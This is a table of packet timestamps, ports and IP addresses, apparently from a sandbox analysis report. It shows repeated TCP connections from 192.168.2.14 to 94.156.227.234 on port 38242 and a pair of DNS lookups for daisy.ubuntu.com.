Dec 27, 2024 09:15:58.513380051 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:58.513498068 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:58.856287956 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:58.976010084 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:58.976181030 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:58.976293087 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:59.095782995 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:59.483540058 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:59.643358946 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:00.186892033 CET	38242	51440	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:00.186992884 CET	51440	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:00.484401941 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:00.603980064 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:00.604064941 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:00.604101896 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:00.723571062 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:01.109262943 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:01.271289110 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:01.805336952 CET	38242	51442	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:01.805438042 CET	51442	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:02.110522985 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:02.230133057 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:02.230274916 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:02.230340004 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:02.349884033 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:02.737517118 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:02.899168968 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:03.420984030 CET	38242	51444	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:03.421148062 CET	51444	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:03.738903046 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:03.858534098 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:03.858620882 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:03.858654976 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:03.978332996 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:04.364527941 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:04.527266026 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:05.017141104 CET	38242	51446	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:05.017349958 CET	51446	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:05.366034985 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:05.485711098 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:05.485866070 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:05.485913038 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:05.605428934 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:05.993896008 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:06.155400991 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:06.644272089 CET	38242	51448	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:06.644403934 CET	51448	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:06.995075941 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:07.114886999 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:07.114995003 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:07.115132093 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:07.234687090 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:07.620598078 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:07.783374071 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:08.264425993 CET	38242	51450	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:08.264616966 CET	51450	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:08.621491909 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:08.741744995 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:08.742036104 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:08.742103100 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:08.861876965 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:09.248373985 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:09.411294937 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:09.949863911 CET	38242	51452	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:09.949966908 CET	51452	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:10.249872923 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:10.369498968 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:10.369817972 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:10.369844913 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:10.489924908 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:10.876933098 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:11.039361000 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:11.517360926 CET	38242	51454	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:11.517486095 CET	51454	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:11.878293037 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:11.997991085 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:11.998204947 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:11.998269081 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:12.118019104 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:12.505362988 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:12.667366982 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:13.198663950 CET	38242	51456	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:13.198811054 CET	51456	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:13.506699085 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:13.626463890 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:13.626590014 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:13.626646996 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:13.746299028 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:14.133857965 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:14.295471907 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:14.746639013 CET	38242	51458	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:14.746779919 CET	51458	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:15.136652946 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:15.256273985 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:15.256444931 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:15.256531000 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:15.376138926 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:15.763427019 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:15.923419952 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:16.462332010 CET	38242	51460	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:16.462656021 CET	51460	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:16.764913082 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:16.884679079 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:16.884850979 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:16.884907007 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:17.004582882 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:17.392262936 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:17.555391073 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:18.085072994 CET	38242	51462	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:18.085352898 CET	51462	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:18.393827915 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:18.513659954 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:18.513863087 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:18.513863087 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:18.633447886 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:19.022335052 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:19.183788061 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:19.676332951 CET	38242	51464	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:19.676398993 CET	51464	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:20.023983002 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:20.143794060 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:20.143965006 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:20.144041061 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:20.264004946 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:20.652215004 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:20.815401077 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:21.653431892 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:21.773123026 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:21.773283005 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:21.773369074 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:21.894088984 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:22.278884888 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:22.439426899 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:22.962539911 CET	38242	51468	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:22.962621927 CET	51468	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:23.279860020 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:23.399620056 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:23.399790049 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:23.399954081 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:23.519740105 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:23.904711962 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:24.067413092 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:24.539854050 CET	38242	51470	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:24.539990902 CET	51470	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:24.905985117 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:25.025801897 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:25.025968075 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:25.026038885 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:25.145526886 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:25.531653881 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:25.695329905 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:26.181866884 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:26.182116032 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:26.532548904 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:26.652065992 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:26.652195930 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:26.652232885 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:26.771797895 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:27.157213926 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:27.319387913 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:27.799619913 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:27.799710989 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:28.158015966 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:28.277703047 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:28.277884007 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:28.277884960 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:28.397581100 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:28.783432007 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:28.947427988 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:29.425064087 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:29.425257921 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:29.784532070 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:30.137162924 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:30.137365103 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:30.137413979 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:30.257034063 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:30.643062115 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:30.807403088 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:31.387403965 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:31.387501955 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:31.644455910 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:31.764516115 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:31.764792919 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:31.764792919 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:31.884516001 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:32.269476891 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:32.431551933 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:32.981601954 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:32.981736898 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:33.270862103 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:33.390578032 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:33.390697002 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:33.390782118 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:33.510411978 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:33.897939920 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:34.059963942 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:34.658809900 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:34.659071922 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:34.899302006 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:35.019054890 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:35.019182920 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:35.019289017 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:35.138752937 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:35.524832010 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:35.687571049 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:36.181778908 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:36.181853056 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:36.525782108 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:36.645515919 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:36.645612001 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:36.645647049 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:36.765213966 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:37.149982929 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:37.311455965 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:37.766087055 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:37.766168118 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:38.151137114 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:38.270986080 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:38.271107912 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:38.271162033 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:38.390829086 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:38.777271032 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:38.939749956 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:39.393718958 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:39.393861055 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:39.778578997 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:39.898447990 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:39.898730040 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:39.898765087 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:40.018436909 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:40.405225992 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:40.567601919 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:41.101763964 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:41.101867914 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:41.406292915 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:41.526057005 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:41.526376009 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:41.526376009 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:41.646095037 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:42.032735109 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:42.141844034 CET	38242	51466	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:42.142051935 CET	51466	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:42.197788000 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:42.716773033 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:42.716886997 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:43.033992052 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:43.153736115 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:43.153850079 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:43.153850079 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:43.273547888 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:43.661307096 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:43.824126005 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:44.436530113 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:44.436808109 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:44.663153887 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:44.783097982 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:44.783217907 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:44.783262968 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:44.902975082 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:45.289992094 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:45.451572895 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:46.291059017 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:46.410696030 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:46.410862923 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:46.410907984 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:46.531404972 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:46.916239023 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:47.079502106 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:47.567806005 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:47.567945004 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:47.917337894 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:48.036973953 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:48.037029028 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:48.037051916 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:48.158653975 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:48.541114092 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:48.703442097 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:48.945995092 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:48.946125031 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:49.218790054 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:49.218909979 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:49.542062998 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:49.662056923 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:49.662141085 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:49.662168026 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:49.786961079 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:50.166716099 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:50.327548027 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:50.798635960 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:50.798755884 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:51.167571068 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:51.287292957 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:51.287410975 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:51.287451029 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:51.406992912 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:51.791273117 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:51.951631069 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:52.469646931 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:52.469733000 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:52.792167902 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:52.911818981 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:52.911886930 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:52.911910057 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:53.031601906 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:53.417076111 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:53.579515934 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:54.141207933 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:54.141283989 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:54.418262959 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:54.538064957 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:54.538331032 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:54.538331032 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:54.657924891 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:55.043545008 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:55.203696012 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:55.697499990 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:16:55.697638035 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:16:56.044665098 CET	51510	38242	192.168.2.14	94.156.227.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:14:53.622292042 CET	48854	53	192.168.2.14	1.1.1.1
Dec 27, 2024 09:14:53.622411013 CET	56123	53	192.168.2.14	1.1.1.1
Dec 27, 2024 09:14:53.846465111 CET	53	56123	1.1.1.1	192.168.2.14
Dec 27, 2024 09:14:53.849684954 CET	53	48854	1.1.1.1	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 09:14:53.622292042 CET	192.168.2.14	1.1.1.1	0x9140	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:14:53.622411013 CET	192.168.2.14	1.1.1.1	0xe211	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 09:14:53.849684954 CET	1.1.1.1	192.168.2.14	0x9140	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:14:53.849684954 CET	1.1.1.1	192.168.2.14	0x9140	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false

System Behavior

